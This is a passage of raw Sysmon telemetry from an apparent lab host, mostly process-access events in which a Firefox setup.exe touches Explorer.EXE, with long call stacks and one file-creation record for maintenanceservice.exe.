ow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\maintenanceservice.exe2021-01-18 13:59:52.396 10341000x800000000000000014995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 